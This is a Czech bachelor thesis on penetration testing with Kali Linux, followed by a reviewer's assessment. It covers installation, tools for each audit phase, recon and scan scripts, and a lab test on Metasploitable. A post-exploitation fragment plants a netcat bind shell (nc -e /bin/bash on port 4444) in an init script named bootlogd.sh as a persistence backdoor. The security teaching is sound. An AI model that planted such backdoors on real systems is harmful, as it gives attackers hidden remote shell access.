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Anotace:

Název: Počítačová bezpečnost s využitím OS Kali Linux

Bakalářská práce se zabývá tématikou počítačové bezpečnosti s využitím operačního

systému Kali Linux. V úvodní části práce je operační systém krátce představen. Hlavní část

práce je zaměřena na penetrační testování a představení nástrojů souvisejících s jednotlivým

fázemi bezpečnostního auditu. V závěru práce je proveden bezpečnostní test na virtuálním

stroji s operačním systémem Metasploitable.

Annotation:

Title: Computer security and operating system Kali Linux

The Bachelor Thesis is focused on computer security with use of the Kali Linux

operating system. In the beginning, the operating system is briefly introduced. The main part

of the bachelor thesis aims at penetration testing and introduction of tools that are helpful with

particular phases of security audit. At the end of the bachelor thesis, there is a security audit

example on virtual machine using Metasploitable as its operating system.
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1 Úvod

Je doba informace – informační věk. Internetem proudí neuvěřitelné množství dat. Ko-

munikace probíhá převážně po síti. Počítač už není jediným uzlem v této pavučině. Do sítě je

nyní možné se připojit přes mobilní telefony, tablety a televize. Vznikají inteligentní budovy,

kdy je například celá domácnost řízena po internetu. Firmy propojují své pobočky vzdálené

tisíce mil od sebe. S nástupem nových technologií se člověk snaží usnadnit si život. Na druhou

stranu se lze čím dál častěji dočíst o útocích hackerů.

Počítačová bezpečnost je v současné době médii hodně diskutovaným tématem. Zahr-

nuje širokou oblast, kam patří nejen zabezpečení hardware a software firmy, ale například i

vzdělávání personálu o možných rizicích a vypracovávání krizových plánů. Firmy si čím dál

častěji najímají IT odborníky, vědomy si hrozícího nebezpečí.

K testování počítačové bezpečnosti slouží takzvané penetrační testy. Tyto testy se

skládají z několika fází a mají za cíl simulovat postup útočníka a odhalit tak chyby v počíta-

čových systémech. Na základě výsledků těchto testů jsou pak přijata protiopatření a organi-

zace může být lépe zabezpečena.
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2 Kali Linux

Kali Linux je bezplatná linuxová distribuce odvozená od distribuce Debian. Jedná se

o pokročilou distribuci určenou k penetračnímu testování a bezpečnostním auditům.

Předchůdcem Kali (myšleno Kali Linux) je BackTrack. Kali dodržuje vývojové standardy

Debianu. Obsahuje více než 300 nástrojů pro penetrační testování. Implementuje Filesystem

Hierarchy Standard (FHS). Podporuje více jazyků, mezi něž patří i čeština, avšak převážná

většina nástrojů je v angličtině. Podporuje systémy založené na ARM architektuře. Rozdílem

oproti ostatním linuxovým distribucím je využití superuživatele (root). Zatímco na ostatních

distribucích je uživatel nabádán k používání práv běžného uživatele, už z povahy Kali Linux

toto není možné. Většina nástrojů totiž vyžaduje rootovská práva. Odstranění bezpečnostní

vrstvy mezi operačním systémem a uživatelem je jedním z důvodů, proč Kali není distribuce

vhodná pro začínající uživatele. Dalším rozdílem je defaultní zákaz většiny síťových služeb.

Povolené a zakázané služby můžeme zobrazit/editovat v takzvaných blacklistech a

whitelistech. Jedná se o složku /usr/sbin/update-rc.d. Službu lze přidat do whitelistu pomocí

příkazu:

Analogicky disable. Posledním rozdílem je využití tzv. Upstream kernel. Což znamená, že

Kali nemá vlastní kernel (jádro), ale využívá kernel jiných distribucí (konkrétně Debianu). 1

2.1 Instalace

Kali Linux je možné stáhnout jako iso soubor. K dostání je jak v 32, tak 64 bitové

verzi. Soubory je doporučené stahovat z oficiálních stránek2 a po stažení porovnat kontrolní

sumu (sha1 checksum), zdali nedošlo k manipulaci. Dále je možné Kali stáhnout jako

VMware virtuální stroj. VMware obraz existuje ve 32 bitové PAE (Physical Address Exten-

sion) verzi. Poslední možností je stažení ARM obrazu. Pro jednotlivá ARM-orientovaná zaří-

zení je třeba stáhnout příslušný obraz. Kali linux je možné instalovat z CD a USB. V případě,

že zařízení nemá CD mechaniku ani USB porty, lze využít PXE (Preboot eXecution Environ-

ment) a nabootovat tak Kali ze serveru. Od verze 1.0.7 lze také nově přidat perzistenci do Live

Kali bootovaného z USB. Znamená to, že změny, které v systému provedeme, se zapíší na

USB médium. Jednou z možností je instalace Kali z mini obrazu. Pro instalaci Kali Linux

1 Více o Kali Linux na adrese http://docs.kali.org/introduction/what-is-kali-linux

2 http://www.kali.org/downloads

root@kali:~# update-rc.d <nazev sluzby> enable

http://docs.kali.org/introduction/what-is-kali-linux
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Mini ISO je doporučeno rychlé připojení k internetu, jelikož se z internetu většina balíků (pac-

kage) stahuje. Při instalaci je možné zašifrovat celý disk, nebo jen jeho část. Šifrovat se dá i

USB zařízení. Postup je stejný, liší se pouze výběrem oddílu.

2.2 Obecně

Kali lze spouštět i bez instalace a to pomocí tzv. Live buildů. Live buildy jsou ke

stažení na oficiálních stránkách, nicméně je i možné vytvoření a přizpůsobení vlastního Live

buildu. Na stránkách Debianu3 je uveden manuál a popis, jak live build vytvořit. Kali de-

faultně používá prostředí Gnome4. V Souboru config/package-lists/kali.list.chroot se dá de-

faultní prostředí před instalací změnit. Toho lze využít zejména při vytváření Live buildu. Po

instalaci systému přichází na řadu aktualizace. Updaty aplikací a kernelu se v linuxových sys-

témech stahují z tzv. repositories. Repositories si lze představit jako internetová úložiště, kde

se dají nalézt nejnovější zdrojové kódy. Adresa vedoucí k těmto úložištím se dá editovat v

souboru /etc/apt/sources.list. S balíčky se dá manipulovat pomocí příkazů dpkg a apt. Přičemž

utilita apt hlídá závislosti na ostatních balíčcích. Vzhledem k implicitním pravomocem uživa-

tele root je možné příkaz sudo vynechat.

V příloze č. 1 se nachází skript na aktualizování Kali.

Po instalaci by se v souboru sources.list měli nacházet dvě adresy. Jak uvádí vývojáři sys-

tému Kali [1], není doporučené přidávat další a zejména neoficiální zdroje, neboť by mohlo

dojít k poškození systému. Kali defaultně obsahuje většinu ovladačů, avšak pro grafické karty

od společnosti nVidia je třeba je nainstalovat. Postup jak toho docílit je popsán na oficiálních

stránkách Kali. Oficiální IRC kanál lze nalézt na síti Freenode s názvem #kali-linux. Kali

dále používá 3 hlavní repositories, které jsou celosvětově zrcadleny.

Jedná se o:

 http.kali.org – hlavní package

 security.kali.org – security package

 cdimage.kali.org – repositories s ISO obrazy.

3 http://live.debian.net/manual/3.x/html/live-manual/examples.en.html
4 Čteme [genome]

root@kali:~# apt-get install <jméno balíčku>
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Oficiální stránky jsou:

 kali.org – hlavní stránka s novinkami

 docs.kali.org - dokumentace

 forums.kali.org – fórum

 bugs.kali.org – hlášení chyb

 git.kali.org – sledování vývoje projektu

2.3 První spuštění

K zavádění systému Kali používá tzv. GRand Unified Bootloader (GRUB). Výchozí

přihlašovací jméno je nastaveno na root a heslo na toor. K zobrazení grafického uživatelského

rozhraní je, jako u většiny UNIX-like systému, použit X Window System. Hlavní obrazovka

Kali obsahuje horní lištu se záložkami, plochu s ikonou Computer, a také spodní lištu s přepí-

načem pracovních ploch. Záložky na horní liště jsou Applications, Places, prohlížeč a termi-

nál, datum a čas, pošta, ovládání hlasitosti a bluetooth, nastavení síťového připojení a ikona

s bublinou a uživatelským jménem, která slouží obdobně jako ikona Start u OS Windows.

Nejzajímavější je záložka Applications. Menu Applications obsahuje další záložky s pro-

gramy. Dají se zde nalézt programy pro správu systému (záložka System Tools), základní

balík programů (Accessories), programy pro práci s grafikou, kancelářské programy, utility

týkající se elektroniky a programování a další. Stěžejní je však záložka Kali Linux. Ta obsa-


[…]


vi /etc/init.d/bootlogd.sh

#!/bin/sh
nc –nvlp 4444 –e /bin/bash

/etc/init.d/bootlogd.sh &

netstat -tul | grep 4444

tcp 0 0 *:4444 *:* LISTEN
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Obrázek 14 KeepNote a reportování. Zdroj: Daniel Buřval

Obrázek 15 Maltego a reportování. Zdroj: Daniel Buřval
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6 Shrnutí výsledků

Cílem práce bylo představit operační systém Kali Linux, ukázat jeho využití při bez-

pečnostním auditu a představit nástroje obsažené v distribuci.

V úvodu bakalářské práce je zmíněno, jak Kali Linux nainstalovat a jaké jeho verze

jsou momentálně dostupné. Nadneseno bylo také to, že se nejedná o operační systém pouze

pro notebooky, či stolní počítače, ale i pro ARM zařízení. V úvodu také proběhlo krátké se-

známení s grafickým uživatelským rozhraním Kali.

V práci se dále řeší téma počítačové bezpečnosti. Toto téma se týká především nej-

slabšího článku v bezpečnostním řetězci, kterým je člověk. Ať už se jedná o slabá hesla, špatně

nakonfigurované přístupové body do sítě, či obecná neznalost v oblasti bezpečnosti, týkající

se například elektronické pošty a otevírání neznámých souborů v příloze.

Stěžejní část bakalářské práce se zabývá penetračním testováním. Představeno je

všech pět fází penetračního testování. Jednotlivé fáze jsou vždy popsány a jsou k nim uvedeny

i použitelné nástroje obsažené v Kali Linux. V závěru práce je pak provedena praktická

ukázka penetračního testu na virtuálním stroji s operačním systému Metasploitable. V přílo-

hách jsou pak přidány skripty, které slouží k automatizaci a usnadnění některých úkonů, při

provádění testů.
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7 Závěry a doporučení

Bezpečnost bude vždy nedílnou součástí nejen IT odvětví. Se skutečností, že jsou vy-

nalézány stále novější a novější informační technologie, se nutně musí vyvíjet i jejich zabez-

pečení. Stejně tak, zde budou existovat i lidé, kteří se budou záměrně nabourávat do nezabez-

pečených systémů. Někteří za účelem poškodit vlastníka systému - ať už se jedná o získání

konkurenční výhody, finančního zisku či z politických důvodů a jiní, kteří se budou snažit

systémy chránit a zvyšovat jejich bezpečnost.

Neexistuje zaručený návod jak počítačové systémy dokonale ochránit, nicméně exis-

tuje řada pravidel a postupů, které pomáhají minimalizovat rizika ohrožení systému. Z hle-

diska implementace zabezpečení systémů platí pravidlo, kdy chceme docílit takového stavu,

aby úsilí, riziko odhalení a finanční prostředky potřebné na narušení bezpečnostního systému

byly adekvátní v porovnání s hodnotou, která je bezpečnostním systémem chráněna. Zabez-

pečení počítačových systémů není „jednorázovou“ činností, ale jedná se o neustálý proces,

který bude třeba neustále měnit, upravovat, přizpůsobovat a vylepšovat.
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10 Přílohy

První příkazy slouží k aktualizaci balíčku a jádra. Zbylé řádky provádí změnu adresáře, sta-

žení databáze ze stránek exploit-db.com, její extrahování a poslední příkaz vymazání staže-

ného zabaleného archivu.

#!/bin/bash

#updating Kali
apt-get update && apt-get upgrade –y && apt-get distupgrade –y

#updateing DB
cd /usr/share/exploitdb
wget http://www.exploit-db.com/archive.tar.bz2
tar –xvjf archive.tar.bz2
rm archive.tar.bz2

Příloha č. 2
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Jedná se o skript určený k vyhledání jmenných serverů dané domény a pokusu o přenos zóny

na každém z nalezených serverů. Obsahuje funkci usage, která říká, jakým způsobem se skript

používá, kontroluje počet zadaných argumentů skriptu a dále se pokouší o přenos zóny ke

každému nalezenému jmennému serveru.

#/bin/bash

function usage(){
echo "[*] Zone transfer script"
echo "[*] Usage: $0 <domain name> "
echo "[*] Example: $0 domain.com"
exit 0
}
if [ "$#" -ne 1 ]; then
usage;
else
echo "[*] Attempt to zone transfer"
for server in $(host -t ns $1 | cut -d " " -f 4);do
host -l $1 $server |grep "has address"
done;
echo "[*] Finished";
fi

Příloha č. 3
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Skript je potřeba spustit před každým startem OpenVASu. Dochází k aktualizování databáze,

spuštění démona skeneru, zkompilování databáze, zálohování databáze, spuštění manažera na

portu 9390, spuštění skeneru na portu 9393 a spuštění aplikace na portu 9392

#!/bin/bash

#OpenVAS updates
openvas-nvt-sync
openvassd
openvasmd --rebuild
openvasmd --backup
openvasmd -p 9390 -a 127.0.0.1
openvassd -p 9393 -a 127.0.0.1
gsad --http-only --listen=127.0.0.1 -p 9392

Příloha č. 4
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Skript slouží ke skenování lokální sítě. Pro každý nalezený aktivní stroj je pak proveden sken

pro otevřené porty.

#!/bin/bash

function usage(){
echo "[*] LAN full scan script"
echo "[*] Usage: $0 <my ip Address>"
echo "[*] Example: $0 192.168.1.12"
exit 0
}

if [ "$#" -ne 1 ]; then
usage;
else
startOfIP=$(echo $1 | cut -d "." -f 1,2,3)
echo "$startOfIP.0/24" > range.txt
for host in $(nmap -sn -iL range.txt | grep "report for" | cut -d
" " -f 5);
do
nmap -sT -sV -p 1-65535 $host;
done;
rm range.txt
echo "[*] Finished"
fi
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