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Název práce: Počítačová bezpečnost s využitím OS Kali Linux

Autor posudku: Antonín Slabý

Cíl práce: Bakalářská práce se zabývá tématikou počítačové bezpečnosti
s využitím operačního systému Kali Linux. V úvodní části práce
je operační systém krátce představen . Hlavní část práce je
zaměřena na penetrační testování a představení nástrojů
souvisejících s jednotlivým fázemi bezpečnostního auditu . V
závěru práce je proveden bezpečnostní test na virtuálním stroji
s operačním systémem Metasploitable.

Povinná kritéria hodnocení práce
Stupeň hodnocení

(známka)

1 2 3 4

Práce svým zaměřením odpovídá studovanému oboru

Vymezení cíle a jeho naplnění

Náročnost práce na teoretické znalosti

Náročnost práce na praktické dovednosti

Adekvátnost použitých metod, způsob jejich použití

Hloubka a správnost provedené analýzy

Práce s literaturou

Logická stavba a členění práce

Jazyková a terminologická úroveň

Formální úprava a náležitosti práce

Vlastní přínos studenta

Využitelnost výsledků práce v teorii (v praxi)

Dílčí připomínky a náměty:

Celkové posouzení práce a zdůvodnění výsledné známky:
Práce je poměrně zdařilým úvodem do OS Linux Kali a vybraných částí problematiky
bezpečnosti. Důraz je kladen na penetrační testování, které důkladně probráno, je
realizováno též prakticky. ( fáze, nástroje, skripty, realizace na virtuálním stroji) a které je
nejcennějším přínosem práce.
Práce je psána jasným jazykem, ale vyskytují se hovorové prvky, nepřesnosti i překlepy.

Práci doporučuji k obhajobě.
Otázky pro diskusi:
Autor by se mohl věnovat problémům spojeným se stěžejní částí své práce: Penetračnímu
testování na VMware virtuálním stroji a jeho jednotlivým fázím, vysvětlení nějakého
náročnějšího skriptu, rysům a způsobům použití testovacího OS Linux Metasploitable.

Navržená výsledná známka: velmi dobře

V Hradci Králové , dne 7.5. 2015

podpis
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